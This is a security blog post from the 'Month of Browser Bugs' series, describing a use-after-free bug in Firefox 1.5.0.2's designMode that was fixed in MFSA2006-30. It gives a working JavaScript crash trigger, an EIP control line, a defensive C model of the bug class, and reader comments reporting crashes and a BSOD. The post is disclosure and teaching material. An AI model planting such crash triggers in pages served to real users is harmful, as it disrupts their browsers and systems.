MoBB #4: Mozilla Firefox DesignMode
The following bug was tested on Mozilla Firefox 1.5.0.2 running on Gentoo Linux. This bug was fixed in Firefox 1.5.0.3, after three other people reported this issue to Mozilla. The bug causes a call through a function pointer stored in a heap object that has already been freed. Exploiting it is more annoying than difficult, since getting user-provided memory to map over the freed object pointer is more convoluted than it should be.
// Put the whole document into editing mode.
document.designMode = "on";
// Insert a large number of iframes through the editor command; each one gets its own content window.
for (var i = 0; i < 300; i++) {
  document.execCommand("InsertHTML", false, "<iframe src='localhost'/>");
}
// Leave editing mode, then reload; the reload is where the stale function pointer gets called.
document.designMode = "off";
window.location.reload(true);
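The bug class described above, a callback pointer living inside a heap object that is invoked after the object was torn down, as an added C model (this is not Mozilla's code; the `Window`/`Document`/`focus` names are hypothetical stand-ins for the iframe content window and its owner). Objects come from a fixed pool instead of malloc so that the stale call is reproducible and observable instead of undefined behaviour. The buggy path frees the window but leaves the owner's pointer dangling; the fixed path clears every reference when the object dies and makes the call site refuse when there is nothing to call:

```c
#include <stdio.h>
#include <stddef.h>

/* Added example, not Firefox code. Hypothetical model of the bug class:
 * a callback pointer held in a heap object, invoked after that object was freed. */

#define POOL_SIZE 4

typedef struct Window {
    void (*focus)(struct Window *self);   /* the function pointer at issue */
    const char *name;
} Window;

typedef struct Document {
    Window *active;   /* reference to the current window; may dangle */
} Document;

static Window pool[POOL_SIZE];
static int in_use[POOL_SIZE];

/* Counters inspected by the scenarios below. */
static int good_focus_calls;
static int stale_focus_calls;

static void live_focus(Window *self) {
    (void)self;
    good_focus_calls++;
}

/* Poison callback installed on free: reaching it means a dangling pointer was
 * dereferenced and its callback invoked through memory that is no longer owned. */
static void stale_focus(Window *self) {
    (void)self;
    stale_focus_calls++;
}

static Window *window_alloc(const char *name) {
    for (int i = 0; i < POOL_SIZE; i++) {
        if (!in_use[i]) {
            in_use[i] = 1;
            pool[i].focus = live_focus;
            pool[i].name = name;
            return &pool[i];
        }
    }
    return NULL;
}

static void window_free(Window *w) {
    ptrdiff_t i = w - pool;
    in_use[i] = 0;
    w->focus = stale_focus;   /* models the freed slot being overwritten */
    w->name = NULL;
}

/* Buggy pattern: teardown frees the window but leaves doc->active pointing at
 * it, and the later focus() trusts that pointer blindly. */
static void buggy_teardown(Document *doc) {
    window_free(doc->active);
    /* doc->active now dangles */
}

static int buggy_focus(Document *doc) {
    doc->active->focus(doc->active);   /* call through the freed object */
    return 0;
}

/* Fixed pattern: clear every reference when the object dies, and treat
 * "no window" as an error at the call site instead of dereferencing. */
static void safe_teardown(Document *doc) {
    if (doc->active) {
        window_free(doc->active);
        doc->active = NULL;
    }
}

static int safe_focus(Document *doc) {
    if (doc->active == NULL || doc->active->focus == NULL)
        return -1;   /* nothing to focus; refuse rather than crash */
    doc->active->focus(doc->active);
    return 0;
}

/* Focus while alive, tear down, focus again (as the reload in the PoC does).
 * Returns how many times the stale callback was invoked. */
static int run_scenario(int use_fix) {
    good_focus_calls = stale_focus_calls = 0;
    Document doc = { window_alloc("iframe-window") };
    int (*focus)(Document *) = use_fix ? safe_focus : buggy_focus;
    focus(&doc);
    if (use_fix) safe_teardown(&doc); else buggy_teardown(&doc);
    focus(&doc);
    return stale_focus_calls;
}

int main(void) {
    printf("buggy: stale callback invoked %d time(s)\n", run_scenario(0));
    printf("fixed: stale callback invoked %d time(s)\n", run_scenario(1));
    return 0;
}
```

The poison callback stands in for whatever happens to occupy the freed slot later; in the real browser that content is whatever the allocator hands out next, which is exactly why the post describes getting user-controlled memory to land there as the convoluted part. The defensive point is that the fix is in ownership, not in the call site alone: if the reference is cleared when the object is destroyed, the null check at the call site is sufficient and never sees stale memory.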
Demonstration
EIP on Gentoo Linux / Firefox 1.5.0.1
0x00737069 in ?? ()
This bug was addressed in MFSA2006-30.
This bug has been added to the OSVDB:
Mozilla Firefox iframe.contentWindow.focus() Overflow
26 Comments:
very funny
keep this blog up
Am I allowed to be picky and note that the versions 1.0.5.x should be 1.5.0.x?
Crashed my 1.5.0.4
I did not notice a crash in 1.5.0.4, but with FF Bon Echo 2.0a3 it breaks all hyperlinks. BUG REPORTED TO MOZILLA
just tested on ff 1.5.0.4 windows, it crashed...
crash and BSOD in 1.5.0.4; computer kept BSODing on startup
Crashed my Firefox 1.5.0.4 on Gentoo. IMHO 1.5.x Firefox is just a big piece of sh*t. 1.0.8 was SO much better.
This crashed my 1.5.0.3 on WinXP Pro SP2.
windows 1.5.0.4 crashed
1.5.0.4 crashed the first time, but I could not get it to crash afterwards.
With 1.5.0.4 on Gentoo, it does not crash, but it leaves the tab in "designMode", so you can edit the text in the page. Very fun!
Didn't crash 1.5.0.4 on Windows 2000.
Crashed 1.5.0.3 on Ubuntu 6.06
I guess I don't understand why you're posting about bugs that are already fixed. And anyone that posts that it's still broken should head over to bugzilla and tell them.
The point of the blog is show what types of flaws affect modern browsers. Even if the bug has been fixed, it still applies to anyone who has yet to upgrade. If the bug hasn't been fixed, it will still be reported to the vendor prior to showing up here (with some exceptions).
I think it crashes if you didn't install developer tools.
FreeBSD - Seamonkey 1.0.2
didn't crash, but after a nice CPU burnout it made it impossible to follow links or use the keyboard ;)
Fx 1.5.0.4 on Win XP SP2. It didn't crash, but left the tab in designMode
XP SP2, all latest updates
1.5.0.4 Firefox - many extensions, modifications
If I click the button for the exploit to take place and let it run, it does not crash; however, if I try to close the tab in the middle of its process, it will crash/close the browser
For those left in designMode, here is the link for tracking this bug,
[Bug 343686] Remain in design mode after demonstration of MFSA2006-30
https://bugzilla.mozilla.org/show_bug.cgi?id=343686
Tried this with 1.5.0.4 on Mac OSX. No crash but as reported before links quit working after the test was run.
Ff 2.0 B1 affected by [Bug 343686]
The bug is active just on the tab with FreeBSD 6.1 / Firefox 1.5.3: I can edit the loaded page. But Firefox doesn't crash. I close the tab and create a new one and Firefox seems to be OK
Tested this with a patched version and now cannot click on links without reloading the browser. I'd say this is only a partial patch.
Firefox 2.0 beta does not crash on this.
Both document.designMode and document.execCommand threw security exceptions, as configured by me. Yet another proactive security measure succeeded!